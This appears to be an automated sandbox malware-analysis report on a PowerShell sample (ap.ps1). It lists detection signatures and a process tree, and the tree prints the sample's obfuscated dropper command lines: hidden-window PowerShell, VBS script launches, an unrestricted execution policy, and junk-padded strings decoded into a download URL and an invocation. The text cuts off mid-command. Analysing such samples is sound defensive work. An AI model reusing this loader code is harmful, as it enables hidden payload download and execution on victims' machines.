Edit tour
Windows
Analysis Report
ap.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- powershell.exe (PID: 8104 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\ap. ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8112 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7544 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -win hidde n =iex "[E nvironment ]::GetEnvi ronmentVar iable('pub lic') + '\ \utwxgh.vb s'" MD5: 04029E121A0CFA5991749937DD22A1D9) - wscript.exe (PID: 7448 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \sz3.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 8156 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Anethole s Klosette rnes Venus haar Paral alia Unytt igst Stokk emetoder S canted129 Loftrum243 Nondissip atedly Sma shendes Sa mmenlignin gs Areogra pher Artic ulant Pros sies Vesic ulating Su permishap Adolfine P rostyle Ex erted Tors ken Vespoi d Svejsere Frotteers Kvrulante r Anethole s Klosette rnes Venus haar Paral alia Unytt igst Stokk emetoder S canted129 Loftrum243 Nondissip atedly Sma shendes Sa mmenlignin gs Areogra pher Artic ulant Pros sies Vesic ulating Su permishap Adolfine P rostyle Ex erted Tors ken Vespoi d Svejsere Frotteers Kvrulante r';If (${h ost}.Curre ntCulture) {$Belliss erne++;}Fu nction gaa rdspladsen s($Agerend es){$Dafte r135=$Ager endes.Leng th-$Bellis serne;$Unb urden='SUB sTRI';$Unb urden+='ng ';For( $Un minimizing =5;$Unmini mizing -lt $Dafter13 5;$Unminim izing+=6){ $Anetholes +=$Agerend es.$Unburd en.Invoke( $Unminimi zing, $Bel lisserne); }$Anethole s;}functio n sanktion jtr($Epigy ne){ . ($Emancipe ringerne) ($Epigyne) ;}$Forlnge lsers=gaar dspladsens 'Ol erMTy vekoDi.elz Coenoi Fro nl Heldl.n fusaNatro/ E.cam5Unbr i.Avlsh0Ko ord Fo.b(P o.omW Acce iFravrnAme ntd UnpuoR ealkw Zoon sMyxom .ej sN .hudTRe cor Unend1 Turne0,npo w.Zymoc0Da cty;Predo F,skeWanti piSeptinGu ,gn6Kundg4 Brn,b;Coll a Overixfo rsy6Af ta4 Malt;Fo.e w LawserPr epov Kom,: Barnl1for e2Incom1To m,t.te,eo0 Alloc)B.yt k Vill,G S kyte Retrc kldnk Mav eoChili/L. tre2Redis0 Nazil1Tlin g0C rci0Zi tta1Trkas0 Nonco1 Slu SelecFM.s saiSkyd rS i ine ampf .ostochev ixDemob/tr odd1und.r2 Ser m1Earm u.Stra,0Ex agg ';$Fan gstknivens =gaardspla dsens 'Imp arUPremosa romaeBalla r Unfr-Lec t,APliengR ipo,e Exce nRubritDef in ';$Unyt tigst=gaar dspladsens 'Afvrgh D anstAllest H.stepKomm esbevi,: K .nt/Dosme/ forgwIter .wPal mwNe ur..Housla VagarlC cc ymKlovnr H emawAnnela Skjerd.ndt a. SvrvcUn kinoSultam pimps/,tam mwparanh S kva/Sp.ckS Unin,uLo h ibOrgieoSt orkrSamtad OptrniTap. lnResuneCo mmerPaxone ,hapenGowl kdPingeeRo kkes,usti7 Affld8Unem ..,eadmsUn harmde eni V,nre>Micr ohForlotSt eretKniplp KonklsTill g:Lingu/Re ngr/ Dimyw SusiwBreg .w,onst. S amle Domsr GgepupArgu i-appelrn, rmaoOpryky Ethea Akk rlGarvk-Pr otoc kandr No.atoFe t swfejlmnMe sop. Decai Embaln irk efResteoAn h l/ Cifrw ChanchAtta k/,adioS A laru.ountb IndlsoPara prpian.d S crai Thorn S.ptieFin. irK ntaeCh antnVegetd FingeI,gl osGuden7 B ekr8abrik. ,ydrosKri sm lddeiM. tte ';$Dea ktiverende =gaardspla dsens 'pan or> atol ' ;$Emancipe ringerne=g aardsplads ens 'Bru.h iBlideeRut ,exFyl e ' ;$Almengjo rdes='Loft rum243';$C ometlike = gaardspla dsens ' H lvequ,drcR espohsura, oSniff Tes er%Subcha